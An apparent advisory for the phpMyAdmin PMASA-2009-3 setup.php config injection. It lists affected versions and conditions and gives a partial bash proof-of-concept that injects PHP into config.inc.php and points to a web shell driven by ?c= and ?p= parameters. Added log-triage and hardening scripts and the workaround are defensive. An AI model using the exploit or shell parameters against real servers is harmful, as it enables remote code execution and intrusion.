This vuln can only be exploited against environments where the administrator has chosen to install phpMyAdmin following the *wizard* method, rather than manual method.
Vulnerable Systems:
* phpMyAdmin 2.11.x before 2.11.9.5 (i.e. 2.11.9.4 and prior)
* phpMyAdmin 3.x before 3.1.3.1
Attack requirements:
1) Vulnerable version (obviously!): 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 according to PMASA-2009-3
2) It *seems* this vuln can only be exploited against environments where the administrator has chosen to install phpMyAdmin following the *wizard* method, rather than the manual method: http://snipurl.com/jhjxx
3) The administrator must NOT have deleted the '/config/' directory within the '/phpMyAdmin/' directory, and it must still be writable by the web server user. This is because this directory is where '/scripts/setup.php' tries to create 'config.inc.php', which is the file the PHP code is injected into; if the directory is missing or read-only there is nowhere for the injected file to land.
Proof of concept:
#!/bin/bash
# Excerpt of the PoC as it appears on this page. Two pieces of the original
# are not included here: the body of the injection POST ($postdata1) and the
# body of the follow-up POST ($postdata2). They are left undefined below
# rather than reconstructed; the rest is kept and made coherent (exploit()
# header restored, temp files and the cookie/token fetch declared).

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
    echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
    exit 1
fi
if ! which curl >/dev/null
then
    echo "sorry but you need curl for this script to work!"
    echo "on Debian/Ubuntu: sudo apt-get install curl"
    exit 1
fi

# cookie jar for the setup.php session; $flag receives the phpinfo() output
# once the server executes the injected config.inc.php
cookiejar=$(mktemp)
flag=$(mktemp)

# exploit <form token> <cookie jar> <phpMyAdmin base URL>
exploit() {
    # [first POST to $3/scripts/setup.php with token $1 and cookie jar $2,
    #  body $postdata1: not included in this excerpt]
    if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
    then
        curl -ks --url "$3/config/config.inc.php" >"$flag"
        echo "[+] success! phpinfo() injected successfully! output saved on $flag"
        # second POST (body $postdata2, also not included in this excerpt):
        # per the messages that follow, it writes the ?c= / ?p= handler
        curl -ks -b "$2" -d "$postdata2" --url "$3/scripts/setup.php" >/dev/null
        echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
        echo " $3/config/config.inc.php?c=ls+-l+/"
        echo " $3/config/config.inc.php?p=phpinfo();"
        echo " please send any feedback/improvements for this script to"\
        "unknown.pentester<AT_sign__here>gmail.com"
    else
        echo "[+] no luck injecting to $3/config/config.inc.php :("
        exit 1
    fi
}
# end of exploit function

# fetch the setup form once: the session cookie lands in $cookiejar and the
# hidden 32-hex-digit form token is read from the page. Reconstructed step
# (the excerpt omits it); the markup 'name="token" value="..."' is assumed.
token=$(curl -ks -c "$cookiejar" --url "$1/scripts/setup.php" \
        | grep -o 'name="token" value="[0-9a-f]*"' | grep -o '[0-9a-f]\{32\}' | head -n 1)

if grep phpMyAdmin "$cookiejar" &>/dev/null
then
    length=$(echo -n "$token" | wc -c)
    # valid form token obtained?
    if [[ $length -eq 32 ]]
    then
        echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
        # attempt exploit!
        exploit "$token" "$cookiejar" "$1"
    else
        echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
        exit 1
    fi
else
    echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
    exit 1
fi
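The request sequence the PoC produces (a POST to scripts/setup.php, then requests to config/config.inc.php, with ?c= or ?p= once the handler is in place) is also what to hunt for in web server logs. The following is an added example and not part of the original PoC: it runs over a few constructed combined-format access-log lines (Apache/nginx "combined") and reports, per client, POSTs to setup.php, successful fetches of config.inc.php, and requests carrying the c/p command parameters. The function names and the sample lines are this example's own.

```shell
#!/bin/sh
# Added example: triage web-server logs for the PMASA-2009-3 exploitation
# pattern shown in the PoC above. Sample lines are constructed for this
# example; real logs are piped in on stdin.

SAMPLE_LOG='203.0.113.5 - - [10/Apr/2009:12:00:01 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 5120 "-" "curl/7.18.2"
203.0.113.5 - - [10/Apr/2009:12:00:02 +0000] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 5120 "-" "curl/7.18.2"
203.0.113.5 - - [10/Apr/2009:12:00:03 +0000] "GET /phpMyAdmin/config/config.inc.php HTTP/1.1" 200 48000 "-" "curl/7.18.2"
203.0.113.5 - - [10/Apr/2009:12:00:10 +0000] "GET /phpMyAdmin/config/config.inc.php?c=ls+-l+/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2009:12:01:00 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2009:12:01:05 +0000] "GET /phpMyAdmin/config/ HTTP/1.1" 403 300 "-" "Mozilla/5.0"'

# Combined-format fields as awk sees them: $1 client, $6 "METHOD (with the
# leading quote), $7 request path, $9 status code.

# pma_setup_hits: unique client IPs that POSTed to scripts/setup.php
# (the injection step of the PoC).
pma_setup_hits() {
    awk '$6 == "\"POST" && $7 ~ /\/scripts\/setup\.php/ { print $1 }' | sort -u
}

# pma_config_hits: "ip<TAB>path<TAB>status" for every request that touches
# config/config.inc.php; a 200 here means the injected file is being served.
pma_config_hits() {
    awk '$7 ~ /\/config\/config\.inc\.php/ { print $1 "\t" $7 "\t" $9 }'
}

# pma_triage: one line per client that POSTed to setup.php, with how many
# times it then got a 200 for config.inc.php and how many of those requests
# carried the ?c= / ?p= parameters the PoC's handler uses.
pma_triage() {
    awk '
        $6 == "\"POST" && $7 ~ /\/scripts\/setup\.php/ { post[$1]++ }
        $7 ~ /\/config\/config\.inc\.php/ && $9 == 200  { cfg[$1]++ }
        $7 ~ /config\.inc\.php[?][cp]=/                 { cmd[$1]++ }
        END {
            for (ip in post)
                printf "%s POST_setup=%d config_200=%d cmd_param=%d\n",
                       ip, post[ip], cfg[ip] + 0, cmd[ip] + 0
        }'
}

# Stand-alone run over the constructed sample (use: cat access.log | pma_triage)
printf '%s\n' "$SAMPLE_LOG" | pma_triage
```

A client that appears with config_200 > 0 has very likely landed a file in config/; the config.inc.php copy on disk should then be preserved before the directory is removed.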
Workaround:
Delete the '/config/' directory within the '/phpMyAdmin/' directory; it is only needed while the setup wizard runs. This is because this directory is where '/scripts/setup.php' tries to create 'config.inc.php', which is the file the code is injected into; without a writable '/config/' the injected file cannot be written. Upgrading to 2.11.9.5 or 3.1.3.1, the fixed versions named in PMASA-2009-3, removes the injection itself.
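The workaround applied on the server, as an added example (not from the original advisory). It assumes the standard layout <root>/scripts/setup.php and <root>/config/; the function names and the PMA_EVIDENCE_DIR variable are this example's own. Before deleting config/, it keeps a copy of any config.inc.php found there outside the web root, since on an already-attacked host that file is the evidence.

```shell
#!/bin/sh
# Added example: detect and remove the leftover config/ directory that the
# PoC depends on. Layout <root>/scripts/setup.php and <root>/config/ assumed.

# pma_exposed ROOT: succeed if ROOT still has both scripts/setup.php and a
# config/ directory, i.e. the wizard-install state the exploit targets.
pma_exposed() {
    root=$1
    [ -f "$root/scripts/setup.php" ] && [ -d "$root/config" ]
}

# pma_remove_config ROOT: delete ROOT/config and anything setup.php wrote
# into it. A config.inc.php found there is copied to $PMA_EVIDENCE_DIR
# (default /tmp) first. Succeeds when the directory is gone afterwards.
pma_remove_config() {
    root=$1
    evidence=${PMA_EVIDENCE_DIR:-/tmp}
    if [ -d "$root/config" ]; then
        if [ -f "$root/config/config.inc.php" ]; then
            cp "$root/config/config.inc.php" "$evidence/config.inc.php.$(date +%s)"
            echo "kept a copy of $root/config/config.inc.php in $evidence"
        fi
        rm -rf "$root/config"
        echo "removed $root/config"
    fi
    [ ! -d "$root/config" ]
}

# Usage: sh pma_harden.sh /var/www/phpMyAdmin
if [ "$#" -eq 1 ]; then
    if pma_exposed "$1"; then
        echo "[!] $1 is in wizard-install state: scripts/setup.php and config/ present"
        ls -ld "$1/config"
        pma_remove_config "$1"
    else
        echo "[+] $1: no config/ directory, nothing to do"
    fi
fi
```

Run it against the install root once after the wizard has finished; a second run is a no-op and exits 0.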